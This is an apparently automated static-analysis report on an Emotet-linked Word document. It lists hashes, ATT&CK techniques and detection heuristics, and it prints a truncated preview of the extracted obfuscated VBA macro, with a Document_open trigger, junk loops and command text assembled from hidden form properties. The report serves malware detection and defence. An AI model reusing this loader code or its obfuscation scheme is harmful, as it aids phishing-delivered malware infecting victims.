Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 cd3718878a7ae018…

MALICIOUS

Office (OLE)

188.3 KB Created: 2019-12-16 08:32:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: 508b70f4af4a6090253576e28f14b35b SHA-1: 64d4e443874d9cbd003ff5453a158a0629ba821d SHA-256: cd3718878a7ae018330455ed71c6be7543fe6a01accb30c16e92575812f32e57
302 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate/Decode Files or Information

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for Emotet. Heuristics indicate the use of CreateObject and GetObject, along with a hidden UserForm property command stager, suggesting an attempt to download and execute a secondary payload. ClamAV detection explicitly names this as Emotet.

Heuristics 8

  • ClamAV: Doc.Downloader.Emotet-7458423-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7458423-1
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8109 bytes
SHA-256: e13371cb7926e0cce954e6257119a1bdb1c8a38254c6235468f7edc93492b3e3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Kyrevpin"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Qjniafsohtzkw, 0, 0, MSForms, TextBox"
Private Sub Document_open()
      Dim Gpjxzqvhp
      Dim Fbppzklof
      For Jbqaevsyqnuod = Jqhopfvk To 0
         Yfoouubdlcld = xPI
         Ustzgfigymaor = CDbl(3)
         Lnmbhmgzrmf = Tan(MyeW5A)
         Exsrtcwvaowij = 4 - Bngdbmzpz
         Joscmbxkcbuj = (3 - Dwlyptxuzyd)
         Glfispbs = Xcvkzpfh
         Oxqorkivop = CDbl(6)
         Fzryxtbttwwto = Tan(Ixftqzvnivqq)
      Next
      Dim Khrcephzhfyg
      Dim Mqfybxwryui
      For Xcvhxjkoe = Jqhopfvk To 0
         Tvcnqzcrc = xPI
         Afcvqxsjwu = CDbl(3)
         Jxlyaxychy = Tan(MyeW5A)
         Fuibysrlm = 4 - Pfcsnvvv
         Ltqebbte = (3 - Cgwpvork)
         Exvwvtxe = Mclctaswx
         Hvkzjimwydksk = CDbl(6)
         Xtiieotjpzv = Tan(Uwummewblxmkk)
      Next
      Dim Ecafkuwwyx
      Dim Awmjkyoabvneh
      For Linexvvf = Jqhopfvk To 0
         Zkhuucvq = xPI
         Lsyavjyi = CDbl(3)
         Wxsulnltede = Tan(MyeW5A)
         Fkohfhssnoqpt = 4 - Inxnvbhcrmi
         Cmpwtwsqhct = (3 - Xijbesdykqg)
         Uyiwuwabpbzuv = Xblelfeytqhq
         Rvjfxcuhkhwa = CDbl(6)
         Hjhjwlbjf = Tan(Qpzogmgxi)
      Next
Hcdtgxkcthnf
End Sub

Attribute VB_Name = "Jsbkraxy"
Attribute VB_Base = "0{830EAA7A-1B71-4277-B4AB-3EF880367575}{DD105773-569D-4B16-B191-C6B4AFEA6D1F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Lguhsipfaag"
Function Ajueafukppsix()
      Dim Dwqunlcvs
      Dim Fqclqftqect
      For Yyvkiorife = Jqhopfvk To 0
         Ttbepqzuql = xPI
         Tqosxcdkvf = CDbl(3)
         Qrmesgampzw = Tan(MyeW5A)
         Mplthtnylqsz = 4 - Cacqnxmnxd
         Jlnuuucb = (3 - Sqomiqfaueu)
         Lmiioeyrhyfjc = Wxwxaoimcbp
         Xjqhonbhll = CDbl(6)
         Nvlsicfeoewhw = Tan(Daggyipuyi)
      Next
Glvgiorl = Kyrevpin.Qjniafsohtzkw
      Dim Rbrxawdabkv
      Dim Iemdgitxw
      For Ovufakqa = Jqhopfvk To 0
         Uzpkrrlriaonn = xPI
         Oycgqqvgni = CDbl(3)
         Xzruumjn = Tan(MyeW5A)
         Toqignvobhfvm = 4 - Ubfzsbbmpor
         Ubebereop = (3 - Hlzhywbnfg)
         Dnmurcbupw = Zcdrvgzetvsh
         Nsmemztqansw = CDbl(6)
         Nnulwehwtk = Tan(Gvqivfrxpihkk)
      Next
Qcxkvwdlvty = Glvgiorl + Jsbkraxy.Kioicuxkupknt + Jsbkraxy.Ecclogdoh + Jsbkraxy.Gqemglefkb
      Dim Yvalekapl
      Dim Zaaslpipywaoo
      For Vkuxvthytqz = Jqhopfvk To 0
         Uuylprti = xPI
         Dvudmjxh = CDbl(3)
         Rpqvnkfsc = Tan(MyeW5A)
         Lkgvexoy = 4 - Fujqcbqvpv
         Ykeddyfmbft = (3 - Knhhljjpvmug)
         Joxnmtymvq = Qskkzbmyrnin
         Zxcykwynvx = CDbl(6)
         Hdsyrrgqsqfl = Tan(Uguvfjjzubjx)
      Next
Ovrexuwvzbhqc = Qcxkvwdlvty + Jsbkraxy.Zdvhlzvvtqot + Jsbkraxy.Dmgujvpeglnv
      Dim Rrqrbdqma
      Dim Vjuanewyu
      For Lmxwhzacwkh = Jqhopfvk To 0
         Koturumlcgitm = xPI
         Zsaqcefdt = CDbl(3)
         Rlyaxogwpzlch = Tan(MyeW5A)
         Bigpduvucekr = 4 - Flzpudancitm
         Hnqsqjcwxeb = (3 - Rvwnxfbkommn)
         Ogxvqehmpnra = Inunshjrgvwh
         Tbdfusoq = CDbl(6)
         Lxnfgivwoj = Tan(Ryuoiwac)
      Next
Ajueafukppsix = Muclacme + Ovrexuwvzbhqc + Muclacme
      Dim Kffoulmvin
      Dim Kpbtitdwkknt
      For Pmmiryxnpi = Jqhopfvk To 0
         Wqmtbddgft = xPI
         Knblcarml = CDbl(3)
         Aiawqvwztlvwn = Tan(MyeW5A)
         Jkpvhvlhxdx = 4 - Pqvbptmlah
         Ititpqoblq = (3 - Qabpbcssjlkcq)
         Txfjcckyb = Imjkayizkos
         Xoucxjgdvj = CDbl(6)
         Fhftfbzm = Tan(Gjykltrjsaav)
      Next
End Function
Function H
... (truncated)